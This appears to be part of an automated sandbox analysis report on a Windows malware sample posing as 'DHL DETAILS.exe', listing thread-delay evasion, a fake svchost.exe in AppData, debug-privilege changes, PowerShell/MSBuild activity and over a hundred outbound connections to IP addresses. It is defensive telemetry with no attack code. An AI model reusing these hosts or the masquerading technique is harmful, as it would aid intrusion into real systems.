Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90156
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 89640
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 87625
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 87218
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 86890
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 86687
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 86500
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 86343
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 86140
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 85812
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 85668
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 85328
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 85152
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 85025
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84904
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84768
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84515
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84356
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84218
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84044
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83919
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83625
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83509
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83343
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83230
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83078
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82936
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82806
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82578
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82437
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82265
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82095
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 81828
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 81547
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 81156
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80953
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80725
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80578
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80434
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80066
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 79890
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 79672
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 79487
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 78672
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 78422
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 78257
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 78120
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 77967
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 77781
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 77633
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 77482
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 77266
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 77063
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76941
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76750
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76576
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76391
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76172
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 75875
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 75609
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 75359
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 75076
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74750
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74563
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74374
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74047
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73719
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73514
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73281
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73031
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 72777
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 72516
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 72188
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 71625
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 70000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 69748
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 69453
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 69156
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 68867
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 68469
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 68141
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 67922
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 67700
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 67469
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 67219
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 66969
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 66752
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 66586
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 66359
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 66190
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 66109
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 65875
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 65669
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 65490
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 65203
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 64875
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 64562
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 64312
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 64146
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 63953
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 63797
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 63375
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 63062
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 62859
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 62562
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 62219
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 61974
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 61745
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 61542
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 61359
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 61172
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 60999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 60814
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 60645
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 60484
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 60322
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 60156
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 59984
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 59774
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 59562
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 59382
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 59203
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 59016
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 58828
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 58500
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 58312
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 58125
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 57937
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 57734
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 57516
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 57297
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 57109
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 56891
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 56672
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 56523
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 56311
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 56125
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 55906
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 55625
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 55444
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 55234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 54859
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 52391
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 52016
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 51906
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 51703
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 51341
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 51156
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 50984
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 50818
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 50656
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 50459
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 50266
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 50104
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 49859
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 95766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 95578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 95391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 95109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 94875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 94716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 94547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 94328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 94156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 93953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 93685
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 93422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 93297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: MSBuild.exe, 00000010.00000002.2879177243.0000000006520000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\DHL DETAILS.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.171.243.253 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.245.159.177 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 24.230.33.96 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.216.51.36 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.162.229.215 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.15.139.15 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 18.135.133.116 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 13.234.24.116 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.61.48.24 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.154.178.243 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 98.71.76.170 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 121.128.194.154 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 207.244.255.174 19770
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.43.63.70 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.152.232.217 8181
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.162.135.201 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.95.13.18 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.162.15.98 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.90.22.106 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.70.12.54 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.25.210.102 33240
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.136.182.110 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 101.51.121.29 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.68.235.51 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.5.77.211 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 63.151.67.7 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.243.177.21 8088
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 46.17.63.166 9480
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 62.171.131.101 25847
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.20.94.93 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.11.95.166 6005
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 123.126.158.50 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.25.230.252 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.116.2.52 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.61.55.138 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.57.131.122 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 78.128.81.220 31623
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.47.93.248 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 134.209.29.120 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.162.105.202 8000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 8.219.228.100 15673
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.11.95.165 5000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.235.124.143 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 187.216.144.170 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 158.255.215.50 16993
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 207.180.234.220 47476
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.252.209.80 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.200.220 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 113.68.62.135 9080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 13.59.156.167 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 64.56.150.102 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 155.50.215.37 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 74.103.66.15 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 168.228.36.22 27234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.238.228.202 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.56.83.46 8047
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.94.90.189 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.47.93.244 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.145.6.32 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.131.203.7 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.37.180.40 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.115.232.79 31280
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 211.54.26.187 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 69.61.200.104 36181
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 125.94.219.96 9091
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.190.171.137 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 96.80.235.1 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.158.98.197 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.190.170.254 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 27.123.1.35 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 159.203.104.153 8200
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 169.57.157.148 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 167.250.99.22 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 148.72.23.56 41383
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.99.27.26 8090
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 188.163.170.130 41209
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.190.57.169 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 218.75.69.50 57903
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 169.57.157.146 8123
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.131.14.66 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 164.92.86.113 60283
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 119.8.111.196 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 116.242.89.230 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 43.131.248.165 15673
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 140.82.113.3 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.47.93.223 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 60.190.68.154 7302
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 180.180.152.94 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 188.127.236.58 56694
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 35.185.196.38 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.214.102.195 50366
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.93.76.26 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.236.179.235 1981
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 217.115.115.253 56792
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.49.30.5 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.106.115.50 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 77.46.138.37 33608
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.17.9.114 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.0.228.120 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 20.33.5.27 8888
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 194.4.50.127 12334
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 62.3.6.76 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.19.59.19 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.139.242.1 84
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.12.178.107 29985
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.148.28.218 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 203.96.177.211 33382
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 23.152.40.14 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.76.253.66 3129
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.223.108.13 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.236.0.129 22167
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 107.180.88.173 35774
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 88.198.82.189 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.190.24.119 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.169.249.16 8362
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 166.62.38.100 56191
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 92.205.110.47 14936
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 46.253.143.144 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.125.215.188 8090
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 111.91.231.65 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.76.217.175 8088
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 58.69.201.117 8082
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 14.207.167.114 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 187.122.105.181 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.167.38.7 45650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.241.6.97 59991
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 95.87.30.11 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.54.235.9 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 173.212.206.86 55405
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.241.158.204 52980
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 198.49.68.80 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.229.100.73 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.172.120.91 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 37.187.77.58 19767
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 114.141.61.2 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.20.179.187 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.13.204.24 8082
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 92.204.135.37 26927
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.189.116.108 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.36.150.15 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 64.201.163.133 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.36.150.16 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.19.106.11 12334
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.156.73.54 8080
